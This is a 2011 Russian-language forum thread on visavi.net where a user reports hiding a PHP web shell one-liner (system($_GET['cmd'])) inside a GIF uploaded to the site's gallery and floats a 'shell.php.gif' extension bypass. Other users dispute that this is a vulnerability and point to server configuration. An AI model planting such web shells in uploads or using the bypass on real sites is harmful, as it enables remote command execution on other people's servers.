Уязвимость - шелл

1. Удаленный (19.02.2011 / 23:42)
нечего взламывать не хотел, просто проверил, по этому тут рассказываю

открыл я файл test.gif блокнотом и добавил в самый конец :
<?php system($_GET["cmd"]); ?>
залил картинку на сайт тут: http://visavi.net/gallery/?
- http://visavi.net/gallery/index.php?act=showimg&gid=675&start=0&
можно еще такое на аватаре проверить.

может это уязвимость? может надо что бы сайт фильтровал бы содержимое картинки, или аватара ???

2. Lugaro (20.02.2011 / 03:45)
Не уязвимомоть это и проверку делать нет смысла, всеравно не чем это не грозит, просто банан таким выдавать кто гадит в галерее, а картинку я снес т.к увидел её раньше чем эту тему

3. Neformat (20.02.2011 / 04:04)
С каких пор gif как php выполняется? Руки оторвать за такие настройки сервера

4. Вантуз-мен (20.02.2011 / 05:41)
я ничего не понял, что было-то?

5. Андрей (20.02.2011 / 07:40)
нету там уязвимости... вот аватар мой например)
<?php echo "Hello world"; ?> написал и пофигу

Добавлено через 00:51 сек.
4: Vantuz, внешне, прозрачная картинка была

6. JustZero (20.02.2011 / 10:57)
1. Askme, работать не бут, пока в httacess не пропиш чеб картинку исполняло как пхп скрипт

7. Удаленный (20.02.2011 / 17:13)
Абабагаламага. да, может картинка исполняет, а если например обойти расширение. shell.php.gif ???

8. Александр (20.02.2011 / 17:22)
8, лучше гугл сломай.

9. KOZZ (20.02.2011 / 17:37)
кулхацкер ))

10. Удаленный (21.02.2011 / 20:08)
Прикольные тут теги smile ) не реклама

11. Titov (21.02.2011 / 20:52)
11 и чо ето? http://visavi.net/pages/rating.php?uz=Vantuz&vote=1&
Вантузу рейтинг набиваеш?

12. Удаленный (21.02.2011 / 21:02)
12, да он мне чатлами платит D
 
просто тег интересный [ url=http://адрес_cсылки Название ] [/url]



URL: https://visavi.net/topics/18934